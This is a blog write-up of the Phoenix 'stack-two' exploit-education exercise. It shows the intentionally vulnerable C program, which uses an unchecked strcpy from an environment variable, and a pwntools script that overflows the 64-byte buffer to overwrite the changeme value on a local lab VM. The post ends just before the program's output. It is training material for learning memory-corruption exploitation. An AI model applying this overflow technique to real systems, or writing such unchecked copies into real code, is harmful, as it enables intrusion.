π–ˆπ–žπ–‡π–Šπ–—π–Œπ–šπ–—π–šπŸ’€~$

Hamza's Blog

View on GitHub

Stack-Two

The source code provided:

Source Code


/*
 * phoenix/stack-two, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * If you're Russian to get to the bath room, and you are Finnish when you get
 * out, what are you when you are in the bath room?
 *
 * European!
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  char *ptr;

  printf("%s\n", BANNER);

  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }

  exit(0);
}

Let’s Dig in the code:


Solution


This challenge is very simlar to stack level one, but in this challenge we need to overflow the buffer, change the changeme struct variable to 0x0d0a090a all from the environmental variable, using pwntools we could accomplish this

#!/usr/bin/python
## script by Hamza Saidu
## cyberguru


from pwn import *

# connecting to the remote phoenix server
s = ssh(host='localhost', user='user', password='user', port=2222)

# sending exploit

message ="*"*20 + "setting environmental variable" + "*"*20
env_var = "ExploitEducation=$(python3 -c \"print('A'*64)\")$(echo '\x0a\x09\x0a\x0d')"
run_prog = "/opt/phoenix/amd64/stack-two"

print(s.run(f"printenv;echo {message};export {env_var};printenv;{run_prog}").recvall().decode())

Explanaiton of the code

from pwn import *
# connecting to the remote phoenix server
s = ssh(host='localhost', user='user', password='user', port=2222)
message ="*"*20 + "setting environmental variable" + "*"*20
env_var = "ExploitEducation=$(python3 -c \"print('A'*64)\")$(echo '\x0a\x09\x0a\x0d')"
run_prog = "/opt/phoenix/amd64/stack-two"
print(s.run(f"printenv;echo {message};export {env_var};printenv;{run_prog}").recvall().decode())

So running the program we have: